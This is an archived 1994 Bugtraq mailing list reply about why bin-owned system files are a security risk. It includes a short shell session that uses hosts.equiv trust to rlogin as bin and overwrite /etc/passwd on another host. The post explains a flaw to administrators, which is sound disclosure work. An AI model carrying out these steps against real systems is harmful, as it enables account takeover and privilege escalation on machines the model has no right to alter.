Bugtraq mailing list archives
Re: bin ownership problem
From: george () siltrain demon co uk (George Hodson)
Date: Thu, 19 May 94 13:36:37 BST
Ok, I'll expose my ignorance and ask, what is the specific vulnerability of bin owned files? I understand how it is a problem on NFS exported files to insecure hosts, but what is the risk for files/dirs on a locally non-exported file system? What about groups, is bin a bad group also?The main problem I've ever had with bin owning system files and other user id's owning things as well (daemon, gmaes, etc) is that it's just that much more to watch for. With root owning all the important stuff it centers your attention on that userid and prevention with just one userid.
Also, another (similar) problem is when a host is trusted (recall /etc/hosts.equiv comes with a default "+" on some systems). trusted# su - bin trusted# rlogin gotcha gotcha$ who am i gotcha!bin ttyp3 May 17 08:54 gotcha$ ls -lgd /etc drwxr-sr-x 9 bin staff 2048 May 19 07:08 /etc gotcha$ cd /etc;mv passwd passwd.bak gotcha$ vi passwd #read in passswd.old, make changes etc... bad news! George
Current thread:
- Re: bin ownership problem George Hodson (May 19)
- <Possible follow-ups>
- Re: bin ownership problem Brad Powell - Sun CIS (May 19)
- Re: bin ownership problem Perry E. Metzger (May 19)
- source routing kernel hack Brad Powell - Sun CIS (May 19)
- Re: bin ownership problem Karl Strickland (May 19)
- bosperf bug THOMAS P. WALPOLE (May 19)
- Re: bosperf bug Rick Weldon, Sys. Adm 55060 (May 20)
- Re: bosperf bug Aggelos D. Keromitis (May 20)